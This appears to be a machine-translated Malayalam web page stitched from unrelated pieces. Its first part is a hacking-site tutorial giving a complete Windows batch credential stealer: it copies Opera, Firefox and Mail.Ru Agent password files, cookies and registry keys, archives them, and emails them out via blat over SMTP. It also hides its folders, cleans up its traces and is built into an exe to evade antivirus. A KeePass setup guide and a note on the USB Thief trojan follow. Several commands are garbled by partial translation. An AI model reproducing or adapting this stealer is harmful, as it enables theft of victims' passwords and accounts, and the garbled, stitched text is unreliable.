പാസ്‌വേഡുകൾ മോഷ്ടിക്കുന്ന ഒരു ഫ്ലാഷ് ഡ്രൈവ് എങ്ങനെ നിർമ്മിക്കാം. ഒരു സാധാരണ USB ഫ്ലാഷ് ഡ്രൈവിൽ നിന്ന് ഞങ്ങൾ ഒരു പാസ്‌വേഡ് സംഭരണം സൃഷ്ടിക്കുന്നു. സംരക്ഷിത മോഡ് സജീവമാക്കുക

പാസ്‌വേഡുകളുള്ള ഫയലുകൾ മോഷ്ടിച്ച് നിങ്ങളുടെ മെയിൽബോക്സിലേക്ക് അയയ്‌ക്കുന്ന ഒരു വൈറസ് എത്ര വേഗത്തിലും ബുദ്ധിമുട്ടില്ലാതെയും എഴുതാനും നിർമ്മിക്കാനും കഴിയുമെന്ന് ഈ ലേഖനത്തിൽ ഞാൻ വിവരിക്കും.
വൈറസ് bat"e (CMD, നിങ്ങൾക്ക് അടിസ്ഥാന കമാൻഡുകൾ എടുക്കാം), അതായത്, ഒരു സാധാരണ ടെക്സ്റ്റ് ഫയലിൽ എഴുതപ്പെടും, കൂടാതെ സ്റ്റാൻഡേർഡ്, ബിൽറ്റ്-ഇൻ വിൻഡോസ് ഇൻ്റർപ്രെട്ടർ ഉപയോഗിച്ച് ഇത് നടപ്പിലാക്കും എന്ന വസ്തുതയിൽ നിന്ന് നമുക്ക് ആരംഭിക്കാം. കമാൻഡ് ലൈൻ".
അത്തരം ഒരു വൈറസ് എഴുതുന്നതിന്, അത് മോഷ്ടിക്കുന്ന ഫയലുകളുടെ കൃത്യമായ സംഭരണ ​​ലൊക്കേഷൻ, http://www.blat.net/ ഓഫ്-സൈറ്റിൽ നിന്നോ ഞങ്ങളുടെ സെർവറിൽ നിന്നോ ഡൗൺലോഡ് ചെയ്യാവുന്ന ബ്ലാറ്റ് ഘടകങ്ങൾ, എന്നിവ നിങ്ങൾ അറിഞ്ഞിരിക്കണം. WinRaR ആർക്കൈവർ Rar.exe-ൽ നിന്നുള്ള ഒരു ഘടകവും (നിങ്ങൾക്ക് ഇത് കൂടാതെ ചെയ്യാൻ കഴിയും).
നോട്ട്പാഡ് തുറന്ന് ഇനിപ്പറയുന്ന കോഡ് അവിടെ പകർത്തുക:

@echo off md %systemroot%\wincs md %SystemDrive%\pass\ md %SystemDrive%\pass\opera\ md %SystemDrive%\pass\Mozilla\ md %SystemDrive%\pass\MailAgent\ md %\SystemDrive% MailAgent\reg ആട്രിബ് %systemroot%\wincs +h +s +r ആട്രിബ് %SystemDrive%\pass +h +s +r കോപ്പി /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe" പകർത്തുക /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" കോപ്പി /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib" CD /D % APPDATA%\Opera\Opera\ copy /y wand.dat %SystemDrive%\pass\opera\wand.dat കോപ്പി /y cookies4.dat %SystemDrive%\pass\opera\cookies4.da regedit.exe -ea %SystemDrive%\ pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_MaUSER\Roftware magent_logins3 CD /D %APPDATA% Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul Xcopy Mra\Update\ver.txt %SystemDrive%\pass\ MailAgent /K /H /G /Q /R /S /Y >nul cd %AppData%\Mozilla\Firefox\Profiles\*.default\ copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite കോപ്പി /y key3.db %SystemDrive%\pass\Mozilla\key3.db കോപ്പി /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite കോപ്പി /y %Windir%\Rar.exe %SystemDrive%\pass\Rar .exe >nul del /s /q %SystemRoot%\Rar.exe %SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass\pass.rar %SystemDrive%\pass\ copy /y %SystemDrive%\ pass\pass.rar %systemroot%\wincs\pass.rar cd %systemroot%\wincs %systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u ലോഗിൻ -pw പാസ്‌വേഡ് റെൻ *.rar pass.rar %systemroot%\wincs\blat.exe -body FilesPassword -to [email protected] -അറ്റാച്ച് %systemroot%\wincs\pass.rar rmdir /s /q %SystemDrive%\ പാസ്സ് rmdir /s /q %systemroot%\wincs del /s /q %systemroot%\blat.exe del /s /q %systemroot%\blat.dll del /s /q %systemroot%\blat.lib ആട്രിബ് +എ +s +h +r %systemroot%\wind.exe EXIT cls

ബൂട്ടിൻ്റെ കോഡിനെക്കുറിച്ച് ഞാൻ അധികം എഴുതില്ല.
@എക്കോ ഓഫ് - ബാറ്റിൻകയുടെ ശരീരം മറയ്ക്കുന്നു (അതിനാൽ ഇത് ആവശ്യമില്ല, പക്ഷേ ഇപ്പോഴും)
md %systemroot%\wincs - വിൻഡോസ് സിസ്റ്റം ഫോൾഡറിൽ ഏത് ഡ്രൈവിൽ ഇൻസ്റ്റാൾ ചെയ്തിട്ടുണ്ടെന്നോ അതിൻ്റെ പേര് എന്താണെന്നോ പരിഗണിക്കാതെ തന്നെ Wincs ഫോൾഡർ സൃഷ്ടിക്കുന്നു.
md %SystemDrive%\pass\ - വിൻഡോസ് സിസ്റ്റം ഇൻസ്റ്റാൾ ചെയ്തിരിക്കുന്ന ഡിസ്കിൽ പാസ് ഫോൾഡർ സൃഷ്ടിക്കുന്നു.
md %SystemDrive%\pass\opera\ - ഭാവിയിൽ Opera ബ്രൗസറിൽ നിന്നുള്ള wand.dat, cookies4.dat എന്നിവ പകർത്തുന്ന ഓപ്പറ ഫോൾഡർ സൃഷ്ടിക്കുന്നു (11* പതിപ്പുകൾ വരെ, Opera അതിൻ്റെ പാസ്‌വേഡുകൾ wand.dat ഫയലിൽ സൂക്ഷിക്കുന്നു)
md %SystemDrive%\pass\Mozilla\- ഒരു മോസില്ല ഫോൾഡർ സൃഷ്ടിക്കുന്നു, അവിടെ പാസ്‌വേഡുകൾ സംഭരിച്ചിരിക്കുന്ന മോസില്ല ബ്രൗസറിൽ നിന്നുള്ള ഫയലുകൾ (cookies.sqlite, key3.db, signons.sqlite) ഭാവിയിൽ പകർത്തപ്പെടും.
md %SystemDrive%\pass\MailAgent\- മെയിൽ ഏജൻ്റിൽ നിന്നുള്ള കറസ്പോണ്ടൻസ് ചരിത്രവും രജിസ്ട്രി കീകളും (പാസ്വേഡുകൾ സംഭരിക്കുന്ന) ഫയലുകൾ പകർത്തുന്ന ഒരു MailAgent ഫോൾഡർ സൃഷ്ടിക്കുന്നു.
md %SystemDrive%\pass\MailAgent\reg- ഒരു reg ഫോൾഡർ സൃഷ്ടിക്കുന്നു
ആട്രിബ് %systemroot%\wincs +h +s +r- wincs ഫോൾഡറിൽ ആട്രിബ്യൂട്ടുകൾ ഇടുന്നു, അതുവഴി അത് കാഴ്ചയിൽ നിന്ന് മറയ്ക്കുന്നു.
attrib %SystemDrive%\pass +h +s +r- മുകളിൽ പറഞ്ഞതുപോലെ തന്നെ.
പകർത്തുക /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe"- blat.exe ഫയൽ അപ്‌ലോഡ് ലൊക്കേഷനിൽ നിന്ന് wincs ഫോൾഡറിലേക്ക് പകർത്തുന്നു
പകർത്തുക /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll"- blat.dll ഫയൽ അപ്‌ലോഡ് ലൊക്കേഷനിൽ നിന്ന് wincs ഫോൾഡറിലേക്ക് പകർത്തുന്നു
പകർത്തുക /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib"- blat.lib ഫയൽ അപ്‌ലോഡ് ലൊക്കേഷനിൽ നിന്ന് wincs ഫോൾഡറിലേക്ക് പകർത്തുന്നു
CD /D %APPDATA%\Opera\Opera\ - ഓപ്പറയ്ക്കുള്ള പാസ്‌വേഡുകളുള്ള ഫയലുകൾ (മറ്റ് കാര്യങ്ങളും) സ്ഥിതിചെയ്യുന്ന ഓപ്പറ ഫോൾഡറിലേക്ക് പോകുന്നു.
പകർത്തുക /y wand.dat %SystemDrive%\pass\opera\wand.dat- wand.dat ഫയൽ ഓപ്പറ ഫോൾഡറിലേക്ക് പകർത്തുന്നു
പകർത്തുക /y cookies4.dat %SystemDrive%\pass\opera\cookies4.dat- cookie4.dat ഫയൽ ഓപ്പറ ഫോൾഡറിലേക്ക് പകർത്തുന്നു
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2- പാസ്‌വേഡ് സൂക്ഷിച്ചിരിക്കുന്ന magent_logins2 എന്ന രജിസ്ട്രി കീ, reg ഫോൾഡറിലേക്ക് കയറ്റുമതി ചെയ്യുന്നു
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3- പാസ്‌വേഡ് സൂക്ഷിച്ചിരിക്കുന്ന magent_logins3 എന്ന രജിസ്ട്രി കീ, reg ഫോൾഡറിലേക്ക് കയറ്റുമതി ചെയ്യുന്നു
CD /D %APPDATA% - AppData ഫോൾഡറിലേക്ക് പോകുക
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul- Mra\Base ഫോൾഡറിലെ ഉള്ളടക്കങ്ങൾ MailAgent ഫോൾഡറിലേക്ക് പകർത്തുന്നു
Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul- MailAgent ഫോൾഡറിലേക്ക് ver.txt ഫയൽ പകർത്തുന്നു
cd %AppData%\Mozilla\Firefox\Profiles\*.default\- മോസില്ല ബ്രൗസർ പ്രൊഫൈലുള്ള ഫോൾഡറിലേക്ക് പോകുക
പകർത്തുക /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite- cookies.sqlite ഫയൽ മോസില്ല ഫോൾഡറിലേക്ക് പകർത്തുന്നു
പകർത്തുക /y key3.db %SystemDrive%\pass\Mozilla\key3.db- key3.db ഫയൽ മോസില്ല ഫോൾഡറിലേക്ക് പകർത്തുന്നു
പകർത്തുക /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite- signons.sqlite ഫയൽ മോസില്ല ഫോൾഡറിലേക്ക് പകർത്തുന്നു
പകർത്തുക /y % Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul- WinRar Rar.exe ആർക്കൈവർ ഘടകം പാസ് ഫോൾഡറിലേക്ക് പകർത്തുന്നു
del /s /q %SystemRoot%\Rar.exe- വിൻഡോസ് ഫോൾഡറിൽ നിന്ന് ആർക്കൈവർ ഘടകം നീക്കംചെയ്യുന്നു
%SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\- പാസ് ഫോൾഡറിലെ ഉള്ളടക്കങ്ങൾ ആർക്കൈവ് ചെയ്യുക
പകർത്തുക /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rarസൃഷ്ടിച്ച ആർക്കൈവ് wincs ഫോൾഡറിലേക്ക് പകർത്തുക
cd %systemroot%\wincs - wincs ഫോൾഡറിലേക്ക് പോകുക
%systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u ലോഗിൻ -pw പാസ്‌വേഡ് - അംഗീകാരത്തിനായുള്ള ഡാറ്റ വ്യക്തമാക്കി കത്ത് അയച്ചുകൊണ്ട് ആർക്കൈവ് അയയ്‌ക്കാൻ ബ്ലാറ്റ് പ്രോഗ്രാം തയ്യാറാക്കുന്നു അയച്ചു.
ren *.rar pass.rar - പ്രക്രിയയ്ക്കിടെ ആർക്കൈവ് തെറ്റായ പേര് എടുത്തില്ലെങ്കിൽ, ഞങ്ങൾ അതിനെ pass.rar എന്ന് പുനർനാമകരണം ചെയ്യും
%systemroot%\wincs\blat.exe -body ഫയലുകളുടെ പാസ്‌വേഡ് -ടു [email protected] -അറ്റാച്ച് %systemroot%\wincs\pass.rar- ഏത് തപാൽ വിലാസത്തിലേക്കാണ് കത്ത് അയയ്ക്കേണ്ടതെന്ന് സൂചിപ്പിച്ച് അത് അയയ്ക്കുക.
rmdir /s /q %SystemDrive%\pass- പാസ് ഫോൾഡർ ഇല്ലാതാക്കുക
rmdir /s /q %systemroot%\wincs- wincs ഫോൾഡർ ഇല്ലാതാക്കുക
del /s /q %systemroot%\blat.exe
del /s /q %systemroot%\blat.dll- വിൻഡോസ് ഫോൾഡറിൽ നിന്ന് ബ്ലാറ്റ് ഘടകങ്ങൾ നീക്കം ചെയ്യുക.
del /s /q %systemroot%\blat.lib- വിൻഡോസ് ഫോൾഡറിൽ നിന്ന് ബ്ലാറ്റ് ഘടകങ്ങൾ നീക്കം ചെയ്യുക.
attrib +a +s +h +r %systemroot%\wind.exe- ഞങ്ങൾ സ്വയം ആട്രിബ്യൂട്ടുകൾ ഇടുന്നു, അതുവഴി നമ്മെ കാഴ്ചയിൽ നിന്ന് മറയ്ക്കുന്നു.
എക്സിറ്റ് - ഞങ്ങൾ ബാച്ച് പ്രക്രിയ പൂർത്തിയാക്കി പുറത്തുകടക്കുന്നു.
cls - ഇൻ്റർപ്രെറ്ററിലെ ഏതെങ്കിലും വരികളുടെ ഔട്ട്പുട്ട് മായ്‌ക്കുക.
പകർത്തി, wind.bat ആയി സംരക്ഷിച്ച്, Bat to exe കൺവെർട്ടർ പ്രോഗ്രാം ഉപയോഗിച്ച് exe-ലേക്ക് കംപൈൽ ചെയ്‌തു, തുടർന്ന് ഞങ്ങൾ എല്ലാം ഒരുമിച്ച് ചേർക്കുന്നു, അതായത്, ഞങ്ങൾ Blat പ്രോഗ്രാമിൻ്റെയും WinRar ആർക്കൈവർ ഘടകത്തിൻ്റെയും ഘടകങ്ങൾ എടുത്ത് (നിങ്ങൾക്ക് ഡൗൺലോഡ് ചെയ്യാം) അവയെ ഒട്ടിക്കുക. ഒരു എക്സിക്യൂട്ടബിൾ ഫയൽ, അല്ലെങ്കിൽ ഏതെങ്കിലും പ്രോഗ്രാം ഉപയോഗിച്ച്, എല്ലാ ഫയലുകളും അപ്‌ലോഡ് ചെയ്യുന്നതിനുള്ള പാത %SystemRoot% അല്ലെങ്കിൽ %WindowsDir% അല്ലെങ്കിൽ %windir% ആയിരിക്കണം.
തൽഫലമായി, ഞങ്ങൾക്ക് ആൻ്റിവൈറസുകൾ എടുക്കാത്ത ഒരു വൈറസ് ലഭിക്കുന്നു, കൂടാതെ നിങ്ങളുടെ ഇമെയിലിലേക്ക് ഫയലുകളുള്ള ഒരു ആർക്കൈവ് അയയ്‌ക്കും. ഓപ്പറയിൽ നിന്ന് wand.dat മാത്രം, അത് 11* പതിപ്പുകളിലേക്ക് അപ്‌ഡേറ്റ് ചെയ്‌തിട്ടില്ലെങ്കിൽ, മറ്റെല്ലാ ഫയലുകളും നിങ്ങളുടേത് ഉപയോഗിച്ച് മാറ്റി ഡീക്രിപ്റ്റ് ചെയ്യാൻ കഴിയും.
ഞങ്ങൾക്ക് ഇവിടെ പൂർത്തിയാക്കാൻ കഴിയുമെന്ന് ഞാൻ കരുതുന്നു, എന്നാൽ നിങ്ങൾക്ക് എന്തെങ്കിലും ചോദ്യങ്ങളുണ്ടെങ്കിൽ, ചോദിക്കാൻ മടിക്കരുത്.
നിങ്ങളുടെ ശ്രദ്ധയ്ക്ക് നന്ദി, എല്ലാ ആശംസകളും!
©SwAp TheHackWorld.in

ദശലക്ഷക്കണക്കിന് പാസ്‌വേഡുകളും മറ്റ് ഉപയോക്തൃ വിവരങ്ങളും മോഷ്ടിച്ച സോണിയും അഡോബും ഉൾപ്പെടെ നിരവധി കമ്പനികൾ ഇതിനകം തന്നെ ഹാക്കർമാരുടെ ഇരകളായി മാറിയിട്ടുണ്ട്. "123456" പോലെയുള്ള ദുർബലമായ പാസ്‌വേഡുകളോ പല സേവനങ്ങൾക്കും ഒരേ പാസ്‌വേഡോ ഉപയോഗിക്കുന്നതായി ഈ വിവരങ്ങളുടെ വിശകലനം കാണിക്കുന്നു. ഇത് ഹാക്കർമാർക്ക് അവരുടെ ജോലി ചെയ്യുന്നത് വളരെ എളുപ്പമാക്കുന്നു, അതേ സമയം, അത്തരം അശ്രദ്ധ മനസ്സിലാക്കാവുന്നതേയുള്ളൂ: ഒരു ഡസനിലധികം സങ്കീർണ്ണമായ പാസ്‌വേഡുകൾ ഓർക്കാൻ ആർക്കാണ് കഴിയുക?

ഒരു ലളിതമായ പരിഹാരം കീബോർഡിന് കീഴിൽ ടേപ്പ് ചെയ്ത ഒരു കടലാസ് ആയിരിക്കാം. ഒരു ഹാക്കർ പോലും അതിൽ കടന്നുകയറാൻ കഴിയില്ല, എന്നാൽ നിങ്ങളുടെ കമ്പ്യൂട്ടറിന് സമീപമുള്ള ആളുകളെ നിങ്ങൾ നിരന്തരം നിരീക്ഷിക്കേണ്ടതുണ്ട്. മറ്റൊരാളുടെ കമ്പ്യൂട്ടറിൽ നിന്ന് നിങ്ങളുടെ അക്കൗണ്ടിലേക്ക് ലോഗിൻ ചെയ്യണമെങ്കിൽ ഈ ഷീറ്റ് ഉപയോഗപ്രദമല്ല.

സൗജന്യ കീപാസ് 2 പോർട്ടബിൾ ടൂൾ ഈ പ്രതിസന്ധി പരിഹരിക്കുന്നു. ഇത് പ്രവർത്തിക്കുന്നതിന്, നിങ്ങൾക്ക് 10 MB ശൂന്യമായ ഇടമുള്ള ഒരു USB ഫ്ലാഷ് ഡ്രൈവ് മാത്രമേ ആവശ്യമുള്ളൂ, അതിൽ നിങ്ങൾ പിന്തുണയ്ക്കുന്ന പ്രോഗ്രാം ഇൻസ്റ്റാൾ ചെയ്യും. ഭാവിയിൽ, ഫ്ലാഷ് ഡ്രൈവിൻ്റെ സംരക്ഷിത പ്രദേശത്തിനായി - നിങ്ങൾ ഒരു പാസ്‌വേഡ് മാത്രം ഓർമ്മിക്കേണ്ടതുണ്ട്. എല്ലാത്തിനുമുപരി, അതിൽ കീപാസ് നിങ്ങളുടെ വെബ് സേവനങ്ങൾക്കായുള്ള ലോഗിൻ ഡാറ്റ ഒരു എൻക്രിപ്റ്റ് ചെയ്ത ഡാറ്റാ ബാങ്കിൻ്റെ രൂപത്തിൽ സംഭരിക്കുന്നു, അത് ഒരു മാസ്റ്റർ പാസ്‌വേഡ് ഉപയോഗിച്ച് പരിരക്ഷിക്കുന്നു.

പാസ്‌വേഡുകൾ മോഷ്ടിക്കുന്ന ട്രോജനുകൾക്ക് ഒന്നും മണക്കാൻ കഴിയില്ല. നിങ്ങൾ ഇനി ഡസൻ കണക്കിന് പാസ്‌വേഡുകൾ ഓർക്കേണ്ടതില്ല എന്നതിനാൽ, ഓരോ വെബ് സേവനത്തിനും നിങ്ങൾക്ക് പുതിയതും ശക്തവുമായ പാസ്‌വേഡ് ഉപയോഗിക്കാം. കീപാസ് എങ്ങനെ ഉപയോഗിക്കണമെന്ന് ഞങ്ങൾ ഇപ്പോൾ നിങ്ങളോട് വിശദമായി പറയും.

അത് എങ്ങനെ ചെയ്യണം

1 ഒരു പാസ്‌വേഡ് സുരക്ഷിതമായി ഇൻസ്റ്റാൾ ചെയ്യുക


ഒരു പാസ്‌വേഡ് സുരക്ഷിതമായി ഇൻസ്റ്റാൾ ചെയ്യുക

USB ഫ്ലാഷ് ഡ്രൈവ് PC-യിലേക്ക് തിരുകുക, അതിൽ ഒരു പുതിയ ഫോൾഡർ സൃഷ്‌ടിക്കുക, അവിടെയുള്ള KeePass സോഫ്റ്റ്‌വെയർ ഉപയോഗിച്ച് ആർക്കൈവിൻ്റെ ഉള്ളടക്കങ്ങൾ പകർത്തുക. KeePass.exe പ്രോഗ്രാം പ്രവർത്തിപ്പിക്കുക. സമാരംഭിച്ചതിന് ശേഷം, പോപ്പ്-അപ്പ് വിൻഡോയിലെ "പ്രാപ്തമാക്കുക" ക്ലിക്കുചെയ്ത് അപ്ഡേറ്റുകൾക്കായി യാന്ത്രിക തിരയൽ സജീവമാക്കുക. തുടർന്ന് "കാണുക |" തിരഞ്ഞെടുക്കുക ഭാഷ മാറ്റുക" കൂടാതെ "കൂടുതൽ ഭാഷകൾ നേടുക" ക്ലിക്കുചെയ്യുക.

"റഷ്യൻ |" എന്നതിൽ ക്ലിക്ക് ചെയ്ത് തുറക്കുന്ന സൈറ്റിൽ നിന്ന് റഷ്യൻ ഭാഷാ ഫയൽ ഡൗൺലോഡ് ചെയ്യുക 2.25+". ഒരു USB ഡ്രൈവിലേക്ക് ആർക്കൈവിലെ ഉള്ളടക്കങ്ങൾ അൺസിപ്പ് ചെയ്യുക. “കാണുക | ഭാഷ മാറ്റുക", "റഷ്യൻ" തിരഞ്ഞെടുത്ത് "അതെ" ബട്ടൺ അമർത്തി KeePass പുനരാരംഭിക്കുക.

2 ഒരു പുതിയ പാസ്‌വേഡ് ഡാറ്റാബേസ് സൃഷ്‌ടിക്കുക


ഒരു പുതിയ പാസ്‌വേഡ് ഡാറ്റാബേസ് സൃഷ്‌ടിക്കുക

ഫയൽ തിരഞ്ഞെടുക്കുക | പുതിയത്" കൂടാതെ ഒരു USB ഡ്രൈവ് പാസ്‌വേഡ് സംഭരണമായി വ്യക്തമാക്കുക. അടുത്ത വിൻഡോയിൽ, പ്രധാന രഹസ്യവാക്ക് സജ്ജമാക്കാൻ പ്രോഗ്രാം നിങ്ങളോട് ആവശ്യപ്പെടും. നിങ്ങൾ കീപാസ് ആരംഭിക്കുമ്പോഴെല്ലാം അത് നൽകേണ്ടതുണ്ട്.

3 സംരക്ഷിത മോഡ് സജീവമാക്കുക


സംരക്ഷിത മോഡ് സജീവമാക്കുക

KeePass-നുള്ള നിങ്ങളുടെ പാസ്‌വേഡ് വായിക്കുന്നതിൽ നിന്ന് ട്രോജൻ തടയുന്നതിന്, Windows 7-ലെ UAC-ന് സമാനമായി അത് നൽകുന്നതിന് പ്രോഗ്രാമിൻ്റെ പരിരക്ഷിത മോഡ് നിങ്ങൾ ഉപയോഗിക്കണം. ഇത് ചെയ്യുന്നതിന്, KeePass-ൽ, "ടൂളുകൾ | ക്രമീകരണങ്ങൾ | സെക്യൂരിറ്റി", വിൻഡോയുടെ ഏറ്റവും താഴെയായി നീക്കി "സുരക്ഷിത മോഡിൽ പ്രധാന രഹസ്യവാക്ക് നൽകുക" എന്നതിന് അടുത്തുള്ള ബോക്സ് ചെക്കുചെയ്യുക.

4 പാസ്‌വേഡുകൾ ഉപയോഗിച്ച് ഡാറ്റാബേസ് പൂരിപ്പിക്കുക


പാസ്‌വേഡുകൾ ഉപയോഗിച്ച് ഡാറ്റാബേസ് പൂരിപ്പിക്കുക

കീപാസിന് പാസ്‌വേഡുകൾ ഗ്രൂപ്പുകളായി അടുക്കാൻ കഴിയും. സ്ഥിരസ്ഥിതിയായി, നിങ്ങളുടെ പുതിയ പാസ്‌വേഡ് ബാങ്കിന് "OS" അല്ലെങ്കിൽ "ഇൻ്റർനെറ്റ്" പോലുള്ള ഗ്രൂപ്പുകളുണ്ട്. ഒരു പുതിയ എൻട്രി സൃഷ്‌ടിക്കുന്നതിന്, ഉചിതമായ ഗ്രൂപ്പ് തിരഞ്ഞെടുക്കുക (അല്ലെങ്കിൽ പുതിയത് സൃഷ്‌ടിക്കുക), വലതുവശത്തുള്ള വൈറ്റ് ഏരിയയിൽ വലത്-ക്ലിക്കുചെയ്യുക, തുടർന്ന് "എൻട്രി ചേർക്കുക" ക്ലിക്കുചെയ്യുക.

എല്ലാ ഫീൽഡുകളും പൂരിപ്പിച്ച് ശരി ക്ലിക്കുചെയ്യുക. ഓരോ അക്കൗണ്ടിലേക്കും ലോഗിൻ ചെയ്യുന്നതിന് നിങ്ങൾക്ക് ഇനി പാസ്‌വേഡുകൾ ഓർമ്മിക്കേണ്ട ആവശ്യമില്ലാത്തതിനാൽ, നിങ്ങൾക്ക് പുതിയതും കൂടുതൽ സങ്കീർണ്ണവുമായവ സജ്ജീകരിക്കാൻ കഴിയും, ഉദാഹരണത്തിന്, passwort-generator.com എന്ന വെബ്‌സൈറ്റിൽ സൃഷ്ടിക്കാൻ കഴിയും.

5 സ്വയമേവയുള്ള അംഗീകാരം ഉപയോഗിക്കുക


KeePass ഉപയോഗിച്ച് നിങ്ങൾക്ക് സേവനത്തിലേക്ക് ലോഗിൻ ചെയ്യണമെങ്കിൽ, അനുബന്ധ പാസ്‌വേഡ് സംഭരിച്ചിരിക്കുന്ന ഗ്രൂപ്പ് തുറക്കുക. KeePass പാസ്‌വേഡ് സ്റ്റോറിലെ അനുബന്ധ എൻട്രിയിൽ വലത്-ക്ലിക്കുചെയ്ത് ഡ്രോപ്പ്-ഡൗൺ ലിസ്റ്റിൽ നിന്ന് "ആട്ടോഡയലിംഗ് ആരംഭിക്കുക" തിരഞ്ഞെടുക്കുക. ഇതിനുശേഷം, പ്രോഗ്രാം നിങ്ങളുടെ ഡാറ്റ ബ്രൗസറിലേക്ക് മാറ്റും, കൂടാതെ ബ്രൗസർ ഒരു പുതിയ വിൻഡോ തുറക്കും, അവിടെ നിങ്ങൾ നിങ്ങളുടെ അക്കൗണ്ടിലേക്ക് ലോഗിൻ ചെയ്യും.

അംഗീകാരത്തിനായി ബ്രൗസറിൽ നിങ്ങൾ സാധാരണയായി നൽകുന്ന URL "URL" ഫീൽഡിൽ നൽകണം, അല്ലാത്തപക്ഷം KeePass വഴിയുള്ള സ്വയമേവയുള്ള പാസ്‌വേഡ് എൻട്രി പ്രവർത്തിക്കില്ല.

6 നിങ്ങളുടെ കീപാസ് കഴിവുകൾ വികസിപ്പിക്കുക


നിങ്ങളുടെ കീപാസ് കഴിവുകൾ വികസിപ്പിക്കുക

നിങ്ങൾക്ക് KeePass-ൻ്റെ പ്രവർത്തനം വിപുലീകരിക്കണമെങ്കിൽ, "ടൂളുകൾ | മൊഡ്യൂളുകൾ | കൂടുതൽ മൊഡ്യൂളുകൾ”, അതിനുശേഷം നിങ്ങളെ ഉപയോഗപ്രദമായ വിപുലീകരണങ്ങളുള്ള ഒരു സൈറ്റിലേക്ക് റീഡയറക്‌ടുചെയ്യും (മുകളിലുള്ള പട്ടികയിൽ ഞങ്ങളുടെ ശുപാർശകൾ നിങ്ങൾ കണ്ടെത്തും). ഇപ്പോൾ പ്ലഗിൻ ഡൗൺലോഡ് ചെയ്യുന്നതിനായി അതിൻ്റെ പേരിൽ ക്ലിക്ക് ചെയ്ത് ഫ്ലാഷ് ഡ്രൈവിലേക്ക് അൺസിപ്പ് ചെയ്യുക.

KeePass വീണ്ടും സമാരംഭിച്ച് “ടൂളുകൾ | മൊഡ്യൂളുകൾ". ലഭ്യമായ പ്ലഗിന്നുകളുടെ ഒരു ലിസ്റ്റ് ചുവടെ പ്രദർശിപ്പിക്കും (അവയിൽ ചിലത് ഇഷ്ടാനുസൃതമാക്കാവുന്നതാണ്).

KeePass-നുള്ള മികച്ച വിപുലീകരണങ്ങൾ

മൊബൈൽ ഫോണുകൾക്കുള്ള ബാക്കപ്പ് അല്ലെങ്കിൽ പാസ്‌വേഡ് കൈമാറ്റം പോലുള്ള അധിക ഫംഗ്‌ഷനുകൾക്കൊപ്പം നിങ്ങളുടെ പാസ്‌വേഡ് സുരക്ഷിതമായി നൽകുക.

പേര്

വിവരണം

ഡാറ്റാബേസ് ബാക്കപ്പ് USB ഡ്രൈവ് മോഷ്ടിക്കപ്പെടുകയോ നഷ്‌ടപ്പെടുകയോ ചെയ്‌താൽ പാസ്‌വേഡ് ബാങ്ക് പരിരക്ഷ സജ്ജീകരിക്കുന്നു.
ടുഫിഷ് സൈഫർ
കീഏജൻ്റ് തകർക്കാൻ ഏതാണ്ട് അസാധ്യമായ ഒരു എൻകോഡിംഗ് അൽഗോരിതം ചേർക്കുന്നു; ഇത് കീപാസിൻ്റെ പ്രവർത്തനം മന്ദഗതിയിലാക്കുമെന്ന കാര്യം ശ്രദ്ധിക്കുക.
കീ എക്സ്ചേഞ്ചർ തകർക്കാൻ ഏതാണ്ട് അസാധ്യമായ ഒരു എൻകോഡിംഗ് അൽഗോരിതം ചേർക്കുന്നു; ഇത് കീപാസിൻ്റെ പ്രവർത്തനം മന്ദഗതിയിലാക്കുമെന്ന കാര്യം ശ്രദ്ധിക്കുക.
കീഫോം ഒരു ബട്ടണിൻ്റെ സ്പർശനത്തിൽ നിങ്ങളുടെ പ്രിയപ്പെട്ട സൈറ്റുകൾ തുറക്കുകയും നിങ്ങളുടെ ലോഗിൻ വിവരങ്ങൾ സ്വയമേവ പൂരിപ്പിക്കുകയും ചെയ്യുന്നു.

അസാധാരണമായ ഒരു ട്രോജൻ: ക്ഷുദ്രവെയറിനെ USB തീഫ് (Win32/PSW.Stealer.NAI) എന്ന് വിളിക്കുന്നു. ക്ഷുദ്രവെയർ ഡാറ്റ മോഷണത്തിൽ ശ്രദ്ധ കേന്ദ്രീകരിക്കുന്നു, ഇത് സാധാരണ ഫ്ലാഷ് ഡ്രൈവുകളിൽ വ്യാപിക്കുകയും പ്രവർത്തിക്കുകയും ചെയ്യുന്നു, കൂടാതെ സിസ്റ്റത്തിൽ അതിൻ്റെ സാന്നിധ്യത്തിൻ്റെ സൂചനകൾ വിദഗ്ധമായി മറയ്ക്കുന്നു. ട്രോജൻ സൈബർ ചാരവൃത്തിക്ക് അനുയോജ്യമാണ്, കാരണം ഒരു യുഎസ്ബി ഡ്രൈവ് അവയുമായി ബന്ധിപ്പിക്കാൻ കഴിയുമെങ്കിൽ ഒറ്റപ്പെട്ട സിസ്റ്റങ്ങളിൽ പോലും അതിന് എത്തിച്ചേരാനാകും.

